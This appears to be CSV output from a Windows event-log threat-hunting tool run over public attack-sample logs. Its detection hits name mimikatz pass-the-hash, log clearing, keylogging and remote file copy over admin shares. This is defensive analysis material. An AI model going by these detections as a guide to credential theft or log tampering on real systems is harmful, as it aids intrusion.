365ABB72-B160-5C8E-0000-0010253D1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx 2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx 2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer: | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash 
Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx 2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 
20:27:23.271 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx 2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | 
LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
